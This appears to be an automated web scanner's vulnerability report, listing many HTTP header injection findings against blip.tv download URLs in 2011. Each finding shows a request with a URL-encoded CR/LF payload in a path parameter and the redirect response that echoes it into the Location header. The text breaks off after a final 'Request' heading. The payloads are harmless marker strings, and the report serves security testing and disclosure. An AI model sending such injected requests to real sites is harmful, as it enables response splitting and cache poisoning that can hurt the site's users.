GET /file/feabf%0d%0a25bd50cd6ce/Askaninja-AskANinja011811ThatGlow990.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/feabf 25bd50cd6ce/Askaninja-AskANinja011811ThatGlow990.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 339 Date: Thu, 20 Jan 2011 00:38:17 GMT X-Varnish: 344225596 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/feabf 25bd50cd6ce/Aska ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload dca07%0d%0a649df3a9a60 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/dca07%0d%0a649df3a9a60 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/dca07 649df3a9a60 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:17 GMT X-Varnish: 344225641 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/dca07 649df3a9a60" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 5804c%0d%0a532d4bcc642 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5804c%0d%0a532d4bcc642/get/CookingUpAStory-FoodSwap163.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/5804c 532d4bcc642/get/CookingUpAStory-FoodSwap163.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 314 Date: Thu, 20 Jan 2011 00:38:07 GMT X-Varnish: 344224386 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/5804c 532d4bcc642/get/Cooki ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload df1c2%0d%0a2b7c3d78fd0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/df1c2%0d%0a2b7c3d78fd0/CookingUpAStory-FoodSwap163.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/df1c2 2b7c3d78fd0/CookingUpAStory-FoodSwap163.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 330 Date: Thu, 20 Jan 2011 00:38:08 GMT X-Varnish: 1324524791 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/df1c2 2b7c3d78fd0/Cook ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload f734d%0d%0a484345946d9 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/f734d%0d%0a484345946d9 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/f734d 484345946d9 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:08 GMT X-Varnish: 1248902543 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/f734d 484345946d9" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload e6f6e%0d%0aa39ef88da9f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e6f6e%0d%0aa39ef88da9f/get/CookingUpAStory-FoodSwap232.mp3 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/e6f6e a39ef88da9f/get/CookingUpAStory-FoodSwap232.mp3 Content-Type: text/html; charset=iso-8859-1 Content-Length: 314 Date: Thu, 20 Jan 2011 00:38:11 GMT X-Varnish: 1025264601 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/e6f6e a39ef88da9f/get/Cooki ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 979b1%0d%0aec06ebaac61 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/979b1%0d%0aec06ebaac61/CookingUpAStory-FoodSwap232.mp3 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/979b1 ec06ebaac61/CookingUpAStory-FoodSwap232.mp3 Content-Type: text/html; charset=iso-8859-1 Content-Length: 330 Date: Thu, 20 Jan 2011 00:38:11 GMT X-Varnish: 1274879521 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/979b1 ec06ebaac61/Cook ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload ac814%0d%0a304968691f9 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/ac814%0d%0a304968691f9 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/get/ac814 304968691f9 Content-Type: text/html; charset=iso-8859-1 Content-Length: 302 Date: Thu, 20 Jan 2011 00:38:11 GMT X-Varnish: 1025264681 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/ac814 304968691f9" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 74695%0d%0aea4dd8038a4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /74695%0d%0aea4dd8038a4/get/CookingUpAStory-FoodSwap596.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/74695 ea4dd8038a4/get/CookingUpAStory-FoodSwap596.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 314 Date: Thu, 20 Jan 2011 00:38:10 GMT X-Varnish: 344224694 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/74695 ea4dd8038a4/get/Cooki ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 42054%0d%0ab24829df45f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/42054%0d%0ab24829df45f/CookingUpAStory-FoodSwap596.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/42054 b24829df45f/CookingUpAStory-FoodSwap596.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 Date: Thu, 20 Jan 2011 00:38:10 GMT X-Varnish: 2146043279 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/42054 b24829df45f/Cook ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 29061%0d%0a8022a006d5c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/29061%0d%0a8022a006d5c HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/29061 8022a006d5c Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:10 GMT X-Varnish: 1025264548 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/29061 8022a006d5c" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 104a2%0d%0ad76efe8bd52 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /104a2%0d%0ad76efe8bd52/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/104a2 d76efe8bd52/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 338 Date: Thu, 20 Jan 2011 00:38:12 GMT X-Varnish: 1025264729 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/104a2 d76efe8bd52/get/Cultu ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload b6af5%0d%0a4acb56fedf4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/b6af5%0d%0a4acb56fedf4/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/b6af5 4acb56fedf4/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 354 Date: Thu, 20 Jan 2011 00:38:12 GMT X-Varnish: 1324525344 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/b6af5 4acb56fedf4/Cult ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload aeabe%0d%0a59444e21260 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/aeabe%0d%0a59444e21260 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/aeabe 59444e21260 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:12 GMT X-Varnish: 344225052 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/aeabe 59444e21260" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload fdaab%0d%0af1c4247ece4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /fdaab%0d%0af1c4247ece4/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/fdaab f1c4247ece4/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 338 Date: Thu, 20 Jan 2011 00:38:12 GMT X-Varnish: 1248903057 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/fdaab f1c4247ece4/get/Cultu ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload db0fc%0d%0ab371a187941 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/db0fc%0d%0ab371a187941/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/db0fc b371a187941/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 354 Date: Thu, 20 Jan 2011 00:38:12 GMT X-Varnish: 1025264774 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/db0fc b371a187941/Cult ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 24c8e%0d%0af60a3682fcd was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/24c8e%0d%0af60a3682fcd HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/24c8e f60a3682fcd Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:12 GMT X-Varnish: 1248903142 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/24c8e f60a3682fcd" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload c4f43%0d%0a19dac7572a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c4f43%0d%0a19dac7572a7/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/c4f43 19dac7572a7/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 335 Date: Thu, 20 Jan 2011 00:38:25 GMT X-Varnish: 1498216432 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/c4f43 19dac7572a7/get/Puddi ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload db24f%0d%0ab3adc277396 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/db24f%0d%0ab3adc277396/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/db24f b3adc277396/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 336 Date: Thu, 20 Jan 2011 00:38:25 GMT X-Varnish: 1248904942 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/db24f b3adc277396/Pudd ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 268a9%0d%0ad1cf5597a15 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/268a9%0d%0ad1cf5597a15 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/268a9 d1cf5597a15 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:25 GMT X-Varnish: 1498216515 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/268a9 d1cf5597a15" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload e7343%0d%0a7f7c99de346 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e7343%0d%0a7f7c99de346/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/e7343 7f7c99de346/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 335 Date: Thu, 20 Jan 2011 00:38:27 GMT X-Varnish: 2146045596 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/e7343 7f7c99de346/get/Puddi ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 15aac%0d%0aed07c2899be was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/15aac%0d%0aed07c2899be/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/15aac ed07c2899be/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 336 Date: Thu, 20 Jan 2011 00:38:28 GMT X-Varnish: 1498216841 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/15aac ed07c2899be/Pudd ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload ab976%0d%0a0f16fedc6ba was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/ab976%0d%0a0f16fedc6ba HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/ab976 0f16fedc6ba Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:28 GMT X-Varnish: 1274881790 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/ab976 0f16fedc6ba" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 5ecc3%0d%0a7f0f5967c61 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5ecc3%0d%0a7f0f5967c61/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/5ecc3 7f0f5967c61/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 335 Date: Thu, 20 Jan 2011 00:38:26 GMT X-Varnish: 1025266593 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/5ecc3 7f0f5967c61/get/Puddi ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 5716a%0d%0ad4e7b0c5e2d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
